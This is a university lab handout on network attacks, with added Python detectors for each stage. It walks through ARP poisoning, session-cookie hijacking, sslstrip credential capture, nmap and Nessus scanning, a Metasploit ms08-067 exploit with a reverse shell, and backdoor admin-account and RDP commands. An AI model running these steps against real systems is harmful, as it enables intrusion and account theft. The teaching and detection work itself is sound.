
Cybernetics and Economic Informatics Faculty Information Security Master

Computer Networks Security

Laboratory Topic: Network Attacks

Adrian Furtună MSc, C|EH

adif2k8@gmail.com

“With great power comes great responsibility”

Agenda

1. Interception of network traffic transmitted using a clear-text protocol (HTTP)
   => obtaining session cookies
   => using session cookies to enter a victim's web session
2. Interception of network traffic transmitted using an encrypted protocol (HTTPS)
   => obtaining username and password for web login
3. Scanning the Windows VM using nmap (+Snort disabled/enabled)
4. Scanning the Windows VM using Nessus (+Snort disabled/enabled)
5. Gaining access to the Windows VM by exploiting a network service vulnerability
6. Gaining access to a Windows machine with a client-side attack:
   => social engineering
   => exploit browser vulnerability
   => use Metasploit to own the machine

Network Attacks

2

Rules

It is forbidden:
- Any scanning / attack outside the laboratory network
- Any scanning / attack against your colleagues' machines or against the instructor's machine

Breaking these rules might lead to severe penalties


Administrative tasks

Connect to ftp://stud@my.laptop.ip (username: stud, password: stud)

Download:
- Course slides
- VMWare Player: VMware-player-3.1.3.exe
- Windows VM: winxpsp2_web_snort.zip
- Backtrack VM: bt4-final-vm.zip

Install VMWare Player. Unzip both virtual machines.


Virtual machine configuration

Laboratory setup (1)

You will work in pairs (1 pair = 2 distinct computers): attacker and victim
- Victim machine = host machine
- Attacker machine = Backtrack VM

Start Backtrack [ username: root, password: toor ]
Open graphic mode: startx&
Set the network card in bridged mode!
Obtain IP address: dhclient eth0


Laboratory setup (2)

Exercise 1

Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail account

The victim needs a valid Yahoo mail account (a test account). The victim will open a web mail session.

The attacker:
1. Becomes MITM
2. Captures network traffic of the victim and extracts the necessary data


Exercise 1 – cont.

Attacker machine: become MITM and intercept all traffic sent by the Victim to the Gateway. View the traffic using Wireshark.

1. Find the IP addresses of Victim and Gateway
2. Activate the routing process in Backtrack:
   echo 1 > /proc/sys/net/ipv4/ip_forward
3. Inform the Victim that the Gateway's MAC address is your MAC address – attacker (ARP poisoning using ARP replies):
   arpspoof -i eth0 -t IP_Victim IP_Gateway
4. View the network traffic of Victim using Wireshark
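From the defender's side, the forged replies of step 3 are visible to any host that watches its own ARP table. The following detector is an added example (not from the lab slides); it replays a constructed list of ARP replies and flags an IP rebound to a second MAC, and a MAC answering for several IPs. The gateway address and all MACs are constructed sample values.

```python
"""Detector for the ARP-reply poisoning used in Exercise 1 (added example, not from the slides)."""
from collections import defaultdict

# Constructed sample of ARP "is-at" replies as (sender_ip, sender_mac), seen from the
# victim's side. The last two are forged replies from the attacker's MAC claiming
# the gateway's IP, which is what arpspoof -t IP_Victim IP_Gateway sends (repeatedly).
GATEWAY_IP = "192.168.1.1"
GATEWAY_MAC = "00:11:22:33:44:01"
SAMPLE_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01"),   # legitimate gateway reply
    ("192.168.1.20", "00:11:22:33:44:20"),  # another host on the LAN
    ("192.168.1.50", "aa:bb:cc:dd:ee:50"),  # the attacker's own, genuine binding
    ("192.168.1.1", "aa:bb:cc:dd:ee:50"),   # forged: gateway IP, attacker MAC
    ("192.168.1.1", "aa:bb:cc:dd:ee:50"),   # forged again
]

def detect_arp_spoof(replies, pinned=None):
    """Return alert strings for IP->MAC conflicts in `replies`.

    `pinned` holds bindings the defender trusts up front (the gateway, as a
    static `arp -s` entry would). A reply repeating a known binding is fine;
    a reply that rebinds a known IP to another MAC is an alert, and so is a
    MAC that ends up answering for several IPs (the MITM host's signature).
    """
    table = dict(pinned or {})
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        known = table.get(ip)
        if known is None:
            table[ip] = mac
        elif known != mac:
            alerts.append(f"{ip} rebound from {known} to {mac}")
    ips_per_mac = defaultdict(set)
    for ip, mac in replies:
        ips_per_mac[mac.lower()].add(ip)
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append(f"{mac} answers for {len(ips)} IPs: {sorted(ips)}")
    return alerts

if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_REPLIES, {GATEWAY_IP: GATEWAY_MAC}):
        print("ALERT:", alert)
```

Pinning the gateway binding is what makes the very first forged reply detectable; without it the detector only sees the flip-flop from the second reply on.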


Exercise 1 – cont.

Find the session cookies of Victim and use them to enter his email session

1. Wireshark -> Follow TCP stream on a TCP packet sent by Victim
2. Copy the cookies Y and T in a text file
3. Install the Firefox plugin AddNEdit Cookies
4. Open a Yahoo mail session of your own (attacker)
5. Use the plugin to edit your cookies and replace Y and T with the ones of the Victim
6. Refresh the web page


Exercise 2

Intercept network traffic during an HTTPS session. Find the username and password of the Victim.

1. Make yourself MITM (see exercise 1)
2. Start SSLSTRIP and make it listen on port 1234:
   sslstrip -l 1234 -s -w traffic.log
   More details here: http://www.thoughtcrime.org/software/sslstrip/
3. Configure IPTABLES to redirect HTTP traffic to SSLSTRIP:
   iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1234
4. The victim accesses a web site using HTTPS (ex. Yahoo login)
5. Extract the useful information from file traffic.log
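Both Exercise 1 (cookies captured over HTTP) and Exercise 2 (login downgraded by sslstrip) depend on what the web site's own responses declare: session cookies without the Secure flag, and no Strict-Transport-Security (HSTS) policy that would keep returning browsers on HTTPS. The following audit is an added example (not from the lab slides) that checks a response's header list for those two weaknesses; the header samples are constructed and the cookie names Y and T are taken from Exercise 1.

```python
"""Audit of the response headers that make Exercises 1 and 2 possible (added example)."""

MIN_HSTS_AGE = 31536000  # one year, in seconds

def parse_attrs(value):
    """Parse 'k1=v1; k2; k3=v3' into {lowercased key: value}; the first part is included."""
    attrs = {}
    for part in value.split(";"):
        key, _, val = part.strip().partition("=")
        if key:
            attrs[key.lower()] = val.strip()
    return attrs

def audit_response_headers(headers, session_cookies=("Y", "T")):
    """Return findings for an HTTPS response's (name, value) header list.

    Exercise 1 works because the session cookies also travel over plain HTTP
    (no Secure flag); Exercise 2 works because the browser's first plain HTTP
    request can be held on HTTP by sslstrip (no HSTS policy cached yet).
    """
    findings = []
    hsts = None
    for name, value in headers:
        if name.lower() == "set-cookie":
            cookie = value.split(";", 1)[0].partition("=")[0].strip()
            attrs = parse_attrs(value)
            if cookie in session_cookies and "secure" not in attrs:
                findings.append(f"cookie {cookie} lacks Secure: sent over HTTP, capturable by a MITM")
            if cookie in session_cookies and "httponly" not in attrs:
                findings.append(f"cookie {cookie} lacks HttpOnly: readable from script")
        elif name.lower() == "strict-transport-security":
            hsts = parse_attrs(value)
    if hsts is None:
        findings.append("no Strict-Transport-Security: first HTTP request can be downgraded by sslstrip")
    elif int(hsts.get("max-age", "0")) < MIN_HSTS_AGE:
        findings.append("HSTS max-age too short: policy expires before the next visit")
    return findings

# Constructed samples: a weak web-mail login response and its hardened form.
WEAK_HEADERS = [
    ("Set-Cookie", "Y=v=1&n=abc; Path=/; Domain=.mail.example"),
    ("Set-Cookie", "T=z=def; Path=/; Domain=.mail.example"),
]
HARDENED_HEADERS = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "Y=v=1&n=abc; Path=/; Domain=.mail.example; Secure; HttpOnly"),
    ("Set-Cookie", "T=z=def; Path=/; Domain=.mail.example; Secure; HttpOnly"),
]
```

HSTS only protects a browser that has already received the header over a valid HTTPS connection, so the very first visit remains exposed unless the site is on the browser's preload list.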


About Snort

http://www.snort.org/assets/166/snort_manual.pdf

- Network-based IDS
- Open source (free)
- Sourcefire – commercial version (appliance): http://www.sourcefire.com/
- Portable (Linux, Windows, MacOS X, Solaris, BSD, HP-UX, etc)
- Signatures (rules): www.bleedingsnort.com
- Multiple mechanisms for intrusion detection:
  - Statistic anomalies
  - Protocol anomalies


About Snort – cont.

Snort running modes:
• Sniffer mode (like tcpdump): snort.exe -v -d -e
• Packet logger: snort.exe -vde -l \log
• NIDS: snort.exe -d -l \log -c \etc\snort.conf

Data flow: Packet Stream -> Sniffing -> Packet Decoder -> Preprocessor (Plug-ins) -> Detection Engine -> Output Stage (Plug-ins) -> Alerts/Logs


Nmap briefings

TCP connect() scan:              nmap -sT <IP Address>
TCP SYN scan:                    nmap -sS <IP Address>
UDP scan:                        nmap -sU <IP Address>
Ping scan:                       nmap -sP <IP Address>
TCP FIN / Xmas Tree / Null scan: nmap -sF/-sX/-sN <IP Address>
Version detection:               nmap -sS -sV <IP Address>
OS fingerprinting:               nmap -sS -O <IP Address>

Example: $ nmap -sS -sV -O -F -n 192.168.1.1


Change setup

Start the Windows VM
New attack direction: Backtrack -> Windows VM


Exercise 3

Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).

Obtain the following information (from a single scan):
• Live hosts
• Open TCP ports
• Service version
• Operating system

- Save all output in a text file

Hints: nmap -h, man nmap


Exercise 3 – cont.

Check if the scanning can be detected by a NIDS (Snort)

Authenticate to Windows VM (password: user)
Start Snort:
• cmd.exe -> cd c:\snort\bin
• snort.exe -d -l \log -c \etc\snort.conf -A console

Perform the scanning again using Nmap
Any alert? (see c:\Snort\log\alert.ids)
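What a NIDS looks for in this exercise is many SYNs from one source to many ports on one host in a short time. The detector below is an added example (not from the lab slides and not Snort's code): it applies that threshold-in-a-window logic, in the spirit of Snort's portscan preprocessor, to constructed one-line packet records in an assumed "ts src:port > dst:port flags" layout, with a fast nmap -sS -F style burst as the sample.

```python
"""Port-scan detector in the spirit of Snort's portscan preprocessor (added example)."""
import re
from collections import defaultdict

# One constructed packet record per line: "<ts> <src>:<sport> > <dst>:<dport> <tcp flags>"
LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) (?P<src>[\d.]+):(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<flags>[SAFRPU.]+)$")

THRESHOLD = 15   # distinct destination ports on one host ...
WINDOW = 5.0     # ... within this many seconds

def detect_portscans(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {(src, dst): peak distinct-port count} for sources that crossed the threshold."""
    probes = defaultdict(list)   # (src, dst) -> [(ts, dport), ...] of bare SYNs in the window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["flags"] != "S":   # a SYN without ACK is a connection attempt (scan probe)
            continue
        key = (m["src"], m["dst"])
        ts = float(m["ts"])
        hits = probes[key]
        hits.append((ts, int(m["dport"])))
        while hits and ts - hits[0][0] > window:   # slide the window forward
            hits.pop(0)
        ports = {port for _, port in hits}
        if len(ports) >= threshold:
            alerts[key] = max(alerts.get(key, 0), len(ports))
    return alerts

def sample_lines():
    """Constructed traffic: a little browsing from .20, then a fast SYN scan from .50."""
    lines = [
        "100.000 192.168.1.20:51000 > 192.168.1.10:80 S",
        "100.010 192.168.1.10:80 > 192.168.1.20:51000 SA",
        "100.020 192.168.1.20:51001 > 192.168.1.10:443 S",
    ]
    for i in range(100):   # 100 SYNs to 100 distinct ports in half a second, like nmap -sS -F
        lines.append(f"{200 + i * 0.005:.3f} 192.168.1.50:{40000 + i} > 192.168.1.10:{1 + i * 7} S")
    return lines

if __name__ == "__main__":
    for (src, dst), count in detect_portscans(sample_lines()).items():
        print(f"ALERT: {src} probed {count} distinct ports on {dst}")
```

A scan slowed to one probe per window stays under this threshold, which is the general trade-off of threshold-based detection: a longer window or lower threshold widens coverage at the cost of more alerts on busy hosts.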


Exercise 4

Scan the victim machine using Nessus to find vulnerabilities

1. First install Nessus on BackTrack:
   Download Nessus (for Ubuntu 9.10 32 bit) from http://www.tenable.com
   dpkg -i Nessus-4.4.1-ubuntu910_i386.deb
2. Then obtain a Nessus activation code (Home Feed):
   http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed
3. Configure Nessus server:
   - Add a Nessus user: /opt/nessus/sbin/nessus-adduser
   - Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE
   - Start Nessus server: /etc/init.d/nessusd start
4. Start Nessus client: https://127.0.0.1:8834


Exercise 4 – cont.

Sample vulnerability:
1. Create a scan policy
2. Select plugins
3. Set target
4. Run scan


About Metasploit

Framework for writing and executing exploits

Modules: Exploits, Auxiliary, Payloads, Encoders, Nops

User interfaces:
- console: msfconsole
- GUI: msfgui

Updates:
cd /pentest/exploits/framework3
svn update

Select Exploit -> Configure options + payload -> Run exploit -> Execute payload

Tutorial: http://www.offensive-security.com/metasploit-unleashed


Exercise 5

We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to the Victim machine

1. cd /pentest/exploits/framework3
2. ./msfconsole
3. help
4. search ms08-067
5. use exploit/windows/smb/ms08_067_netapi
6. show options
7. show payloads
8. set RHOST, LHOST, PAYLOAD, TARGET = 3, etc (for payload use windows/shell/reverse_tcp)
9. exploit
10. Execute windows commands in the obtained shell (ex. ipconfig, hostname)


Exercise 5 – cont.

Obtain Remote Desktop access to Victim machine:

Add a new user:
net user myuser mypassword /add

Add the new user to the local Administrators group:
net localgroup Administrators myuser /add

Start the Remote Desktop service:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Check if the victim has opened the port for Remote Desktop (use nmap)

Connect to the victim machine using:
rdesktop 192.168.x.x &
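Each of the three commands above leaves a command line in a process-creation log (Sysmon event 1 or Security event 4688 style), which is where a defender catches this stage. The classifier below is an added example (not from the lab slides); it runs over constructed log records in an assumed "timestamp|user|commandline" layout and tags the account creation, the Administrators membership change and the fDenyTSConnections=0 registry write.

```python
"""Detection of the three persistence commands from Exercise 5 – cont. (added example)."""
import re

# Each rule: (technique label, pattern over the command line). Case-insensitive
# because cmd.exe is; net1.exe and explicit .exe suffixes are accepted as well.
RULES = [
    ("local account created",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+(\S+)(?:\s+\S+)?\s+/add\b", re.I)),
    ("account added to Administrators",
     re.compile(r"\bnet(?:1)?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)),
    ("Remote Desktop enabled via registry",
     re.compile(r"\breg(?:\.exe)?\s+add\s+.*Terminal Server.*?/v\s+fDenyTSConnections\b.*?/d\s+0\b", re.I)),
]

def classify_command(cmdline):
    """Return (technique, account) for a matching command line, else None."""
    for technique, pattern in RULES:
        m = pattern.search(cmdline)
        if m:
            return technique, (m.group(1) if m.groups() else "")
    return None

def scan_log(lines):
    """Parse 'timestamp|user|commandline' records (assumed layout) and return findings."""
    findings = []
    for line in lines:
        ts, user, cmd = line.rstrip("\n").split("|", 2)
        hit = classify_command(cmd)
        if hit:
            findings.append((ts, user, hit[0], hit[1]))
    return findings

# Constructed process-creation log. The three hits run as SYSTEM, as the shell from
# Exercise 5 does when it is spawned by the exploited service; that context is itself a signal.
SAMPLE_LOG = [
    "2011-03-01T10:00:01|NT AUTHORITY\\SYSTEM|C:\\WINDOWS\\system32\\svchost.exe -k netsvcs",
    "2011-03-01T10:02:11|NT AUTHORITY\\SYSTEM|net user myuser mypassword /add",
    "2011-03-01T10:02:15|NT AUTHORITY\\SYSTEM|net localgroup Administrators myuser /add",
    "2011-03-01T10:02:30|NT AUTHORITY\\SYSTEM|reg add \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f",
    "2011-03-01T10:03:00|WINXP\\user|net user",
]

if __name__ == "__main__":
    for ts, user, technique, account in scan_log(SAMPLE_LOG):
        print(f"{ts} {user}: {technique} {account}".rstrip())
```

The same three actions are also visible without command-line logging, as account-management audit events and as a change to the fDenyTSConnections value, so a host without process auditing still has something to alert on.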


What if?

Victim has all ports closed (firewall)
Operating system is patched

Answer: Attack client applications and plugins (web browser, Acrobat Reader, MS Office, etc)


Change setup

Start the firewall of Windows VM
Disable any exceptions
Use nmap to verify that there are no more open ports


Exercise 6

Exploit browser vulnerability to gain remote access. Use Metasploit and browser autopwn

1. cd /pentest/exploits/framework3
2. ./msfconsole
3. use auxiliary/server/browser_autopwn
4. set LHOST 192.168.x.x (attacker IP)
5. set SRVPORT 80
6. set URIPATH mypictures.html
7. exploit


Exercise 6 – cont.

Send victim an email containing the link: http://192.168.x.x/mypictures.html
Victim clicks the link
Attacker obtains meterpreter session


Other useful tools

Ettercap: http://ettercap.sourceforge.net
Cain&Abel: http://www.oxid.it/cain.html
The Middler: http://inguardians.com/tools


Q & A ?
